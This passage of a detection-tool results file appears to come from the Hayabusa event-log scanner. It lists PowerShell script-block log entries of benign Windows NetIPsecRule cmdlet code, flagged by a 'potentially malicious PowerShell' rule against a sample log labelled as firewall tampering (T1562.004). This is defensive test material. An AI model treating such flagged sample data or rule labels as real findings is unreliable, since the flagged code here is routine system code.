$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) 
$__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 
'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value 
= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml 